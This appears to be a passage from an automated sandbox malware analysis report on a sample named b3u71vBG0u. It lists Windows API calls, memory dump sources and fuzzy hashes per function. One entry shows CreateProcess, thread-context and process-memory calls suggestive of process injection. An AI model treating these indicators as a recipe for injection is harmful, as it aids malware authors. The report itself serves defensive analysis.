                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: 54dbb020c78708fee58bd0f65416a8c8fd0d1b9257cd105003cc4f255d0de97f
                    • Instruction ID: 8c8085f7110715e3ddc27e717debd94e73b462e8e34c785efe2d36697c447a00
                    • Opcode Fuzzy Hash: 54dbb020c78708fee58bd0f65416a8c8fd0d1b9257cd105003cc4f255d0de97f
                    • Instruction Fuzzy Hash: 1921A471A10298DBDF059F94C849BEE7BF99F49310F008059E509A7241DBBC5989CF91
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 68544486bd5718f69661a66a2086613020c3ee9c1f5429f9db8ecc74e0118c7e
                    • Instruction ID: d797d1211ac8dce8511713b27cdfacf8152c2db7a8245e15bcb79d0f290a4a9d
                    • Opcode Fuzzy Hash: 68544486bd5718f69661a66a2086613020c3ee9c1f5429f9db8ecc74e0118c7e
                    • Instruction Fuzzy Hash: 8001B971904258BEDB28C7A8CC5AEFE7BF8DB15301F00419AF553D2581E579A6149B60
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 007A9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007A9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: ac840a13dfb9e94311514f829cf783f41a89520d47f2c926c738b8a2bb0f0fa2
                    • Instruction ID: 672e881de40a98acd52a02acbdff258cc223f07eea6135ea61b2c557cd85ef7b
                    • Opcode Fuzzy Hash: ac840a13dfb9e94311514f829cf783f41a89520d47f2c926c738b8a2bb0f0fa2
                    • Instruction Fuzzy Hash: ACD05B7554030D7BDB109B94DC0DFAA772CE704700F0041A1FF5491191DDB455948B95
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a43e27b96558c488ce5e9ef2e395dc78489d4973b1df0410a3bc733fe01e3b2
                    • Instruction ID: a0504c4b44a2a96bbf5fea72cc25f74644a9976181138197e536c49d85e6984f
                    • Opcode Fuzzy Hash: 8a43e27b96558c488ce5e9ef2e395dc78489d4973b1df0410a3bc733fe01e3b2
                    • Instruction Fuzzy Hash: 89F11671608345DFC724DF28C484AAABBE5BF88314F14892DF8999B251E739ED45CF82
                    APIs
                    • _memset.LIBCMT ref: 00744401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007444A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007444C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: de49a857754748b19fac44bb67b5df1a6d5cbca01a6bd14f46f8cc8bbb7e9024
                    • Instruction ID: 55443a2f8daa26bb8e8d83e06cbf26dd515e28d84d62abc6d6fd58bd50df7cb5
                    • Opcode Fuzzy Hash: de49a857754748b19fac44bb67b5df1a6d5cbca01a6bd14f46f8cc8bbb7e9024
                    • Instruction Fuzzy Hash: DD318FB0505741CFD760DF68D884B9BBBF8FB49308F00092EF59A83240E779A958DB92
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00765963
                      • Part of subcall function 0076A3AB: __NMSG_WRITE.LIBCMT ref: 0076A3D2
                      • Part of subcall function 0076A3AB: __NMSG_WRITE.LIBCMT ref: 0076A3DC
                    • __NMSG_WRITE.LIBCMT ref: 0076596A
                      • Part of subcall function 0076A408: GetModuleFileNameW.KERNEL32(00000000,008043BA,00000104,?,00000001,00000000), ref: 0076A49A
                      • Part of subcall function 0076A408: ___crtMessageBoxW.LIBCMT ref: 0076A548
                      • Part of subcall function 007632DF: ___crtCorExitProcess.LIBCMT ref: 007632E5
                      • Part of subcall function 007632DF: ExitProcess.KERNEL32 ref: 007632EE
                      • Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68
                    • RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 3d6c7cba9619fcb828c5b6dec82ae4ff35a98b98bed92d9f91e1b39c7396b752
                    • Instruction ID: 67f96297581dbe972cf4081630c5281ff94820d3c75f8108b8eb3fbfdf69e795
                    • Opcode Fuzzy Hash: 3d6c7cba9619fcb828c5b6dec82ae4ff35a98b98bed92d9f91e1b39c7396b752
                    • Instruction Fuzzy Hash: 7701D271340B15EEE6113B34DC46A2E72989F42730F10012AFD03AB182DF7CAD41AA61
                    APIs
                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007A97D2,?,?,?,?,?,00000004), ref: 007A9B45
                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007A97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007A9B5B
                    • CloseHandle.KERNEL32(00000000,?,007A97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007A9B62
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
                    • Instruction ID: fdb716e05950df86d17423a5a63d1ed8e5708a19770c4581de3a9713b1ec5732
                    • Opcode Fuzzy Hash: 1344cc9387740694b13f4144ecaaaabfc6d30ed7f2a65c77d076a2f994349ed5
                    • Instruction Fuzzy Hash: 2AE08632180218B7D7211B54EC09FCA7F19AB45761F148225FB14690E087B56521979C
                    APIs
                    • _free.LIBCMT ref: 007A8FA5
                      • Part of subcall function 00762F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00769C64), ref: 00762FA9
                      • Part of subcall function 00762F95: GetLastError.KERNEL32(00000000,?,00769C64), ref: 00762FBB
                    • _free.LIBCMT ref: 007A8FB6
                    • _free.LIBCMT ref: 007A8FC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction ID: 86e442b7dec3a6a1333fee9a4cb1f56abcbf1e4f9a42c7521615020d7353b0d4
                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                    • Instruction Fuzzy Hash: AFE012A1A09B028ECAA4A578AD48AD357EE5F89351B28091DB80ADB143DE2CEC428124
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 2ea75ce40b441c4e6dd81ad7c45952cac3c4e9490eb9c4498250be5cd760c5e2
                    • Instruction ID: e313d73c3ac4b9a4fd21ad3b182ad111d17429021404f180e1ee9b82fe7276df
                    • Opcode Fuzzy Hash: 2ea75ce40b441c4e6dd81ad7c45952cac3c4e9490eb9c4498250be5cd760c5e2
                    • Instruction Fuzzy Hash: B6224974648251DFCB24DF14C494B6ABBE1FF85300F15895DE89A8B362D739EC45CB82
                    APIs
                    • IsThemeActive.UXTHEME ref: 00744992
                      • Part of subcall function 007635AC: __lock.LIBCMT ref: 007635B2
                      • Part of subcall function 007635AC: DecodePointer.KERNEL32(00000001,?,007449A7,007981BC), ref: 007635BE
                      • Part of subcall function 007635AC: EncodePointer.KERNEL32(?,?,007449A7,007981BC), ref: 007635C9
                      • Part of subcall function 00744A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00744A73
                      • Part of subcall function 00744A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00744A88
                      • Part of subcall function 00743B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B7A
                      • Part of subcall function 00743B4C: IsDebuggerPresent.KERNEL32 ref: 00743B8C
                      • Part of subcall function 00743B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008062F8,008062E0,?,?), ref: 00743BFD
                      • Part of subcall function 00743B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00743C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007449D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 8780d25e96f198d10da0839455a325703d466394b3442adfdf0507d4ac6d0e85
                    • Instruction ID: 2fb00775d6437c2a83235c9c1ae667b7d4aa483605ed4985ba440f198f3d58d2
                    • Opcode Fuzzy Hash: 8780d25e96f198d10da0839455a325703d466394b3442adfdf0507d4ac6d0e85
                    • Instruction Fuzzy Hash: BC119A71A08311DBC700EF28EC4990AFFE8FB98710F00851EF445932B1EBB49665CB96
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00745981,?,?,?,?), ref: 00745E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00745981,?,?,?,?), ref: 0077E19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d1c4c74d8490f177f6a8645f50fe7032d3e8ad703b18dd565bb0362c384200ff
                    • Instruction ID: 4d7b4f75c6b4dd68caaed3226bd15bdefe9cbc5961ccf4aa359a1d81257b536c
                    • Opcode Fuzzy Hash: d1c4c74d8490f177f6a8645f50fe7032d3e8ad703b18dd565bb0362c384200ff
                    • Instruction Fuzzy Hash: FD015270244718BFF7250E24CC8AF663B9CAB05768F14C319FAE55E1E1C7B85E458B54
                    APIs
                      • Part of subcall function 0076594C: __FF_MSGBANNER.LIBCMT ref: 00765963
                      • Part of subcall function 0076594C: __NMSG_WRITE.LIBCMT ref: 0076596A
                      • Part of subcall function 0076594C: RtlAllocateHeap.NTDLL(01670000,00000000,00000001,00000000,?,?,?,00761013,?), ref: 0076598F
                    • std::exception::exception.LIBCMT ref: 0076102C
                    • __CxxThrowException@8.LIBCMT ref: 00761041
                      • Part of subcall function 007687DB: RaiseException.KERNEL32(?,?,?,007FBAF8,00000000,?,?,?,?,00761046,?,007FBAF8,?,00000001), ref: 00768830
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 634bc5eeece2bb348e9337a8040b8ef1d5c3ba0aa3648c8f9908d68c559597de
                    • Instruction ID: 7f166a02144fa770190f14bfd7386555265faf6c0df12369b2f09b2d1d6badca
                    • Opcode Fuzzy Hash: 634bc5eeece2bb348e9337a8040b8ef1d5c3ba0aa3648c8f9908d68c559597de
                    • Instruction Fuzzy Hash: 6BF0283460030DE6CF21BB98EC0D9DF77AC9F00350F640126FC06A2282EFB89A8192D1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 998173cff1a497950c449fbf1e005fc3fce38157dba8be6a47b2b98914299a8d
                    • Instruction ID: ab62601584eb563cb62a5e8cec8372a9f53888d26269bf4fdd5064b1b53811c3
                    • Opcode Fuzzy Hash: 998173cff1a497950c449fbf1e005fc3fce38157dba8be6a47b2b98914299a8d
                    • Instruction Fuzzy Hash: 7801A771C00A09EBCF12AF69CC0999F7B61AF80360F148315FC166B1A1DB3D8A51EB91
                    APIs
                      • Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68
                    • __lock_file.LIBCMT ref: 0076561B
                      • Part of subcall function 00766E4E: __lock.LIBCMT ref: 00766E71
                    • __fclose_nolock.LIBCMT ref: 00765626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 3ca77da9c438ab2afe7410447002b4968e3e72a52b7da23600ae3541c434f28b
                    • Instruction ID: d8dadbd5701d326020abafa41f4036fbf5a0f15f530cef61153f935acc55019a
                    • Opcode Fuzzy Hash: 3ca77da9c438ab2afe7410447002b4968e3e72a52b7da23600ae3541c434f28b
                    • Instruction Fuzzy Hash: 50F024B1800A04DAD760AF38C80A76E77A12F00B30F548309AC17AB1C1CF7C8941EB56
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0074558F,?,?,?,?,?), ref: 007481DA
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0074558F,?,?,?,?,?), ref: 0074820D
                      • Part of subcall function 007478AD: _memmove.LIBCMT ref: 007478E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$_memmove
                    • String ID:
                    • API String ID: 3033907384-0
                    • Opcode ID: f49c5efa64b0a6741fc147ee38177e2a294afacc9cc9291f7d1c20dcdde8c694
                    • Instruction ID: 9c4f09b0f8b75a1a24dab14e7373ea6c58645dff173579167771367db1890bc1
                    • Opcode Fuzzy Hash: f49c5efa64b0a6741fc147ee38177e2a294afacc9cc9291f7d1c20dcdde8c694
                    • Instruction Fuzzy Hash: FB01AD31201108BFEB246A26DD4AF7B3B6DEB89760F14802AFD06CD190DE749800D6B2
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 02391ACD
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02391AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02391B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1695075216.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2390000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                    • Instruction ID: 89446d59b1efcb7dbef45d2ba11d570d5ce9189b4d38be9b84bbc45058c0bc66
                    • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                    • Instruction Fuzzy Hash: 5112DE24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CF5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
